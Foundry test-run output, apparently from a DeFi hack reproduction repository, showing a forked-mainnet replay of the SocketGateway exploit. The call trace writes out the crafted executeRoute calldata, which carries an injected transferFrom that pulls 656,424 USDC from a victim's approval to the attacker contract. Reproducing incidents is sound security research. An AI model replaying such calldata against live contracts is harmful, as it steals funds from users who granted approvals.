Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.30s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-01/SocketGateway_exp.sol:44:5:
   |
44 |     IERC20 USDC = IERC20(_usdc);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 953.13ms (2.02ms CPU time)

Ran 1 test for src/test/2024-01/SocketGateway_exp.sol:SocketGatewayExp
[PASS] testExploit() (gas: 131464)
Logs:
  Attacker USDC Balance Before exploit: 0.000000
  Attacker USDC Balance After exploit: 656424.984436

Traces:
  [52429] SocketGatewayExp::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19021453 [1.902e7])
    │   └─ ← [Return] 0
    ├─ [33962] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::approve(0x3a23F943181408EAC424116Af7b7790c94Cb97a5, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [26673] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::approve(0x3a23F943181408EAC424116Af7b7790c94Cb97a5, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x3a23F943181408EAC424116Af7b7790c94Cb97a5, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    └─ ← [Stop]

  [136264] SocketGatewayExp::testExploit()
    ├─ [10370] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::symbol() [staticcall]
    │   ├─ [3081] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::symbol() [delegatecall]
    │   │   └─ ← [Return] "USDC"
    │   └─ ← [Return] "USDC"
    ├─ [3339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [3164] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   ├─ [2381] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC Balance Before exploit", val: 0, decimals: 6)
    ├─ [3339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x7d03149A2843E4200f07e858d6c0216806Ca4242) [staticcall]
    │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(0x7d03149A2843E4200f07e858d6c0216806Ca4242) [delegatecall]
    │   │   └─ ← [Return] 656424984436 [6.564e11]
    │   └─ ← [Return] 656424984436 [6.564e11]
    ├─ [1339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x7d03149A2843E4200f07e858d6c0216806Ca4242) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(0x7d03149A2843E4200f07e858d6c0216806Ca4242) [delegatecall]
    │   │   └─ ← [Return] 656424984436 [6.564e11]
    │   └─ ← [Return] 656424984436 [6.564e11]
    ├─ [57657] 0x3a23F943181408EAC424116Af7b7790c94Cb97a5::executeRoute(406, 0x7899f9ed000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000007d03149a2843e4200f07e858d6c0216806ca42420000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000098d5fa5f7400000000000000000000000000000000000000000000000000000000)
    │   ├─ [51440] 0xCC5fDA5e3cA925bd0bb428C8b2669496eE43067e::performAction(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0, SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000000000000000000000000000, 0x23b872dd0000000000000000000000007d03149a2843e4200f07e858d6c0216806ca42420000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000098d5fa5f74) [delegatecall]
    │   │   ├─ [12549] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x3a23F943181408EAC424116Af7b7790c94Cb97a5, 0)
    │   │   │   ├─ [11754] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x3a23F943181408EAC424116Af7b7790c94Cb97a5, 0) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x3a23F943181408EAC424116Af7b7790c94Cb97a5, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [34049] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0x7d03149A2843E4200f07e858d6c0216806Ca4242, SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 656424984436 [6.564e11])
    │   │   │   ├─ [33254] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(0x7d03149A2843E4200f07e858d6c0216806Ca4242, SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 656424984436 [6.564e11]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0x7d03149A2843E4200f07e858d6c0216806Ca4242, to: SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 656424984436 [6.564e11])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x481f0db6c4a6920dad32a79cb76132f5fa8607a35eceb2d5bf3eee4396f4948b: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffa0a1eff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffff67240fbf8b
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x00000000000000000000000000000000000000000000000000000098d5fa5f74
    │   │   │   │   │   @ 0x37cbe5ececd231aeea59b7f1506e2152e86abfa77261ae0c3b3ea5e6b7a5b156: 0x00000000000000000000000000000000000000000000000000000098d5fa5f74 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [55] SocketGatewayExp::receive()
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit SocketSwapTokens(: 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, : 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, : 0, : 0, : 0x77726170706564546f6b656e53776170706572496d706c000000000000000000, : SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [1339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 656424984436 [6.564e11]
    │   └─ ← [Return] 656424984436 [6.564e11]
    ├─ [1870] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::symbol() [staticcall]
    │   ├─ [1081] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::symbol() [delegatecall]
    │   │   └─ ← [Return] "USDC"
    │   └─ ← [Return] "USDC"
    ├─ [1339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(SocketGatewayExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 656424984436 [6.564e11]
    │   └─ ← [Return] 656424984436 [6.564e11]
    ├─ [1164] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   ├─ [381] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC Balance After exploit", val: 656424984436 [6.564e11], decimals: 6)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.58s (4.77s CPU time)

Ran 2 test suites in 10.44s (10.54s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
